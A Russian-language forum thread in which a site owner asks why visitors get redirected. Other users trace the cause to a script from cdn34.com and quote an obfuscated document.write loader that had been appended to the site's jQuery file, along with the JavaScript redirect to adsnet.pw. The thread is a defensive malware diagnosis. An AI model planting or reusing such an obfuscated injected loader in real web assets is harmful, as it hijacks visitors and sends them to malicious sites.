Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Как найти вирусный редирект?


Recommended Posts

Всем привет!

Уже месяц наверное не могу найти причину нежелательного редиректа на сайте ([email protected]).
Если раньше редиректило в основном с французским ip (пожаловались посетители из Франции), то сейчас и из других стран.
Заражение системы компов исключено - проверял и на различных чистейших виртуалках.
Проверял как антивирусом на хостинге, так и всеми возможными онлайн-сервисами. Скачал бэкап, проверил и антивирусами и антималварями - нифига нет.

Где искать заразу?

 

 

Надіслати
Поділитися на інших сайтах


Судя по видео, редирект точно на javascript сделан (не серверный редирект).

И есть ненулевой шанс, что скрипт этот не от вашего сайта грузится (бесполезно искать на хостинге), а со стороннего чего-то.

 

Вас редиректит стабильно или случайно как-то? Я попробовал с нескольких разных vpn и не поймал.

Нужно как минимум с открытой консолью браузера (ctrl+shift+i) открывать и смотреть что за скрипты загружаются, что происходит...

Надіслати
Поділитися на інших сайтах


Вот оно, 100%

Скрины ниже.

На вашу страницу подгружается некая https://cdn34.com/e

И с нее приходит редирект:

if(document.referrer){window.location.href='https://adsnet.pw/?id=czI7NjQxMjM0N2JhZQ==';}

Причем если обновить страницу, то приходит пустота... Но если нажать ctrl+h и потом "забыть" все с этого домена, то снова приходит редирект... в прятки играют :)

 

Короче задача найти где у вас фигурирует cdn34.com и удалить. Возможно это действительно вирус, вставка эта в ни в чем неповинном другом скрипте сделана.

Надо смотреть... пишите в личку если хотите, могу поискать.

Снимок4.png

Снимок5.png

  • +1 1
Надіслати
Поділитися на інших сайтах


Вот этот скрипт:

https://bostanika.ge/catalog/view/javascript/jquery/jquery-2.1.1.min.js

В самом низу:

document.write("<sc"+"ri"+"pt s"+"rc"+"='ht"+"tp"+"s:/"+"/c"+"dn"+"3"+"4.c"+"om/"+"e' as"+"yn"+"c>"+"<\/"+"sc"+"ri"+"pt>");

Как оно туда попало... это уже совсем другая история. И есть ли еще где-то среди сайта что-то подобное.

Снимок6.png

  • +1 1
Надіслати
Поділитися на інших сайтах


13.08.2023 в 22:08, NotSlow сказал:

Вот этот скрипт:

Благодарствую за идеальную подмогу и подсказку!

В принципе, я двигался в нужном направлении, когда вчера начал изучать сведения через консоль разработчика. Но мне тупо не хватило знаний и времени добиться нужного результата. Теперь мои знания расширились)

Метод присадки редиректа явно хитрожопый. Я раньше неоднократно вылавливал различные шеллы и вставки, но тут прям засада - ни один антивирус и антималварь не видит. Теперь принцип понятен - полез конопатить ручками.

Надіслати
Поділитися на інших сайтах


13.08.2023 в 22:23, spectre сказал:

могу решить быстрее и лучше всех с гарантией 3 месяца не за все деньги мира 

Спасибо, учту. Чужими руками даже бесплатно не будет пользы в понимании и опыта. Пока сам.

Гарантия 3 мес. говорит о том, что будет найдена уязвимость, через которую пролезли?

Надіслати
Поділитися на інших сайтах


13.08.2023 в 22:19, iddqden сказал:

Спасибо, учту. Чужими руками даже бесплатно не будет пользы в понимании и опыта. Пока сам.

Гарантия 3 мес. говорит о том, что будет найдена уязвимость, через которую пролезли?

 

у вас самого без навыков не получится, они приобретаются на практике 

 

гарантия работает если не ставите админ админ и модулей с варезных помоек, но зачем это вам если сами)) 

Надіслати
Поділитися на інших сайтах

Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.